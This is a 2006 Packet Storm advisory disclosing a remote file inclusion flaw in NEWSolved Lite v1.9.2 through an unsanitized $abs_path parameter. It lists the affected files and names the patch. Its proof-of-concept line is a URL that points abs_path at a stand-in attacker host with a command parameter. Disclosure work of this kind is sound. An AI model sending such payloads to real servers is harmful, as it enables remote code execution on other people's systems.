sicherheit_286.txt

2006-08-18T00:00:00
ID PACKETSTORM:49083
Type packetstorm
Reporter Philipp Niedziela
Modified 2006-08-18T00:00:00

Description

                                        
                                            `+--------------------------------------------------------------------  
+  
+ NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion  
+  
+--------------------------------------------------------------------  
+  
+ Affected Software .: NEWSolved Lite v1.9.2 (maybe above)  
+ Venedor ...........: http://www.usolved.net  
+ Class .............: Remote File Inclusion  
+ Risk ..............: high (Remote File Execution)  
+ Found by ..........: Philipp Niedziela  
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_286.htm  
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de  
+ http://www.bb-pcsecurity.de  
+  
+--------------------------------------------------------------------  
+  
+ Affected files:  
+  
+ newsscript_lyt.php  
+ newsticker/newsscript_get.php  
+ inc/output/news_theme1.php  
+ inc/output/news_theme2.php  
+ inc/output/news_theme3.php  
+  
+--------------------------------------------------------------------  
+  
+ $abs_path is not properly sanitized before being used  
+  
+--------------------------------------------------------------------  
+  
+ Solution:  
+  
+ Download Patch v1.9.3 and replace the files above.  
+  
+--------------------------------------------------------------------  
+  
+ PoC:  
+  
+ http://[target]/inc/output/news_theme1.php?abs_path=http://evilsite.com?cmd=ls  
+  
+-------------------------[ E O F ]----------------------------------  
`